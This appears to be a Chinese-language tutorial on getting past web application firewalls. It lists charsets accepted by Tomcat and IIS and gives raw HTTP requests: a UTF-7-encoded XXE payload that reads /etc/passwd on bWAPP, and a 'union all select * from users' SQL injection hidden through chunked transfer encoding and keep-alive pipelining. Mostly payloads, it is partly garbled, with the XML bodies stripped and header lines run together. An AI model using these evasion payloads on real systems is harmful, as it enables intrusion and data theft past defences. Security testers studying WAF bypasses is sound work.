Apache-TOMCAT8-JVM1.8-JSP | IBM037&#xff0c;IBM500&#xff0c;IBM870&#xff0c;cp875&#xff0c;IBM1026&#xff0c;IBM01140&#xff0c;IBM01141&#xff0c;IBM01142&#xff0c;IBM01143&#xff0c;IBM01144&#xff0c;IBM01145&#xff0c;IBM01146&#xff0c;IBM01147&#xff0c;IBM01148&#xff0c;IBM01149&#xff0c;utf-16&#xff0c;utf-32&#xff0c;utf-32BE&#xff0c;IBM273&#xff0c;IBM277&#xff0c;IBM278&#xff0c;IBM280&#xff0c; IBM284&#xff0c;IBM285&#xff0c;IBM290&#xff0c;IBM297&#xff0c;IBM420&#xff0c;IBM424&#xff0c;IBM-Thai&#xff0c;IBM871&#xff0c;cp1025 |
Apache-TOMCAT7-JVM1.6-JSP | IBM037&#xff0c;IBM500&#xff0c;IBM870&#xff0c;cp875&#xff0c;IBM1026&#xff0c;IBM01140&#xff0c;IBM01141&#xff0c;IBM01142&#xff0c;IBM01143&#xff0c;IBM01144&#xff0c;IBM01145&#xff0c;IBM01146&#xff0c;IBM01147&#xff0c;IBM01148&#xff0c;IBM01149&#xff0c;utf-16&#xff0c;utf-32&#xff0c;utf-32BE&#xff0c;IBM273&#xff0c;IBM277&#xff0c;IBM278&#xff0c;IBM280&#xff0c; IBM284&#xff0c;IBM285&#xff0c;IBM297&#xff0c;IBM420&#xff0c;IBM424&#xff0c;IBM-Thai&#xff0c;IBM871&#xff0c;cp1025 |
Apache -PHP5&#xff08;mod_php和FastCGI&#xff09; | None |
IIS8-PHP7.1-FastCGI | None |
IIS6、7.5、8、10 -ASP经典 | None |
IIS6、7.5、8、10 -ASPX&#xff08;v4.x&#xff09; | IBM037&#xff0c;IBM500&#xff0c;IBM870&#xff0c;cp875&#xff0c;IBM1026&#xff0c;IBM01047&#xff0c;IBM01140&#xff0c;IBM01141&#xff0c;IBM01142&#xff0c;IBM01143&#xff0c;IBM01144&#xff0c;IBM01145&#xff0c;IBM01146&#xff0c;IBM01147&#xff0c;IBM01148&#xff0c;IBM01149&#xff0c;utf-16&#xff0c;unicodeFFFE&#xff0c;utf-32&#xff0c;utf-32BE&#xff0c;IBM273&#xff0c;IBM277&#xff0c; IBM278&#xff0c;IBM280&#xff0c;IBM284&#xff0c;IBM285&#xff0c;IBM290&#xff0c;IBM297&#xff0c;IBM420&#xff0c;IBM423&#xff0c;IBM424&#xff0c;x-EBCDIC-KoreanExtended&#xff0c;IBM-Thai&#xff0c;IBM871&#xff0c;IBM880&#xff0c;IBM905&#xff0c;IBM00924&#xff0c;cp1025 |
在xxe攻击中&#xff0c;以下攻击被WAF拦截
POST /bWAPP/xxe-2.php HTTP/1.1
Host: 192.168.1.101
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: */*
Accept-Language: zh-CN,zh;q&#61;0.8,zh-TW;q&#61;0.7,zh-HK;q&#61;0.5,en-US;q&#61;0.3,en;q&#61;0.2
Accept-Encoding: gzip, deflate
Content-type: text/xml; charset&#61;UTF-8
Content-Length: 228
Connection: close
COOKIE: security_level&#61;0; PHPSESSID&#61;605bac73f50d32d09e96fd20a3df17e8
]>
对关键payload进行utf-7编码&#xff0c;成功绕过
POST /bWAPP/xxe-2.php HTTP/1.1
Host: 192.168.1.101
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: */*
Accept-Language: zh-CN,zh;q&#61;0.8,zh-TW;q&#61;0.7,zh-HK;q&#61;0.5,en-US;q&#61;0.3,en;q&#61;0.2
Accept-Encoding: gzip, deflate
Content-type: text/xml; charset&#61;UTF-8
Content-Length: 228
Connection: close
COOKIE: security_level&#61;0; PHPSESSID&#61;605bac73f50d32d09e96fd20a3df17e8
&#43;ADwAIQBFAE4AVABJAFQAWQAgAHQ-e&#43;AHMAdAAgAFMAWQBTAFQARQBNACAAIAAiAC8-e&#43;AHQAYwAvAHAAYQBzAHMAdwBvAHI-d&#43;ACIAPg-
]>
在进行测试时候发现下面这段请求被拦截,很明显带有注入特征
POST /sample.aspx?input0&#61;something HTTP/1.1
HOST: victim.com
Content-Type: application/x-www-form-urlencoded; charset&#61;utf-8
Content-Length: 41input1&#61;&#39;union all select * from users--
在头部加入 Transfer-Encoding: chunked 之后&#xff0c;就代表这个报文采用了分块编码。这时&#xff0c;post请求报文中的数据部分需要改为用一系列分块来传输。每个分块包含十六进制的长度值和数据&#xff0c;长度值独占一行&#xff0c;长度不包括它结尾的&#xff0c;也不包括分块数据结尾的&#xff0c;且最后需要用0独占一行表示结束。
POST /sample.aspx?input0&#61;something HTTP/1.1
HOST: victim.com
Content-Type: application/x-www-form-urlencoded; charset&#61;utf-8
Content-Length: 110
Transfer-Encoding: chunked5;
input
4;
1&#61;&#39;u
5;
nion
4;
all
5;
selec
4;
t *
4;
from
5;user
3;
s--
0
原始请求带有明显特征被拦截
GET /sample.aspx?input0&#61;something&input1&#61;&#39;union&#43;all&#43;select&#43;*&#43;from&#43;users-- HTTP/1.1
HOST: victim.com
http协议是由tcp协议封装而来&#xff0c;当浏览器发起一个http请求时&#xff0c;浏览器先和服务器建立起连接tcp连接&#xff0c;然后发送http数据包&#xff0c;其中包含了一个Connection字段&#xff0c;一般值为close&#xff0c;apache等容器根据这个字段决定是保持该tcp连接或是断开。当发送的内容太大&#xff0c;超过一个http包容量&#xff0c;需要分多次发送时&#xff0c;值会变成keep-alive&#xff0c;即本次发起的http请求所建立的tcp连接不断开&#xff0c;直到所发送内容结束Connection为close为止。 下面请求包可能存在绕过&#xff1a;
GET / HTTP/1.1
HOST: victim.com
Content-Type: application/x-www-form-urlencoded; charset&#61;utf-8
Connection:keep-aliveGET / HTTP/1.1
HOST: victim.com
Content-Type: application/x-www-form-urlencoded; charset&#61;utf-8
Connection:keep-aliveGET / HTTP/1.1
HOST: victim.com
Content-Type: application/x-www-form-urlencoded; charset&#61;utf-8
Connection:keep-aliveGET / HTTP/1.1
HOST: victim.com
Content-Type: application/x-www-form-urlencoded; charset&#61;utf-8
Connection:keep-aliveGET /sample.aspx?input0&#61;something&input1&#61;&#39;union&#43;all&#43;select&#43;*&#43;from&#43;users-- HTTP/1.1
HOST: victim.com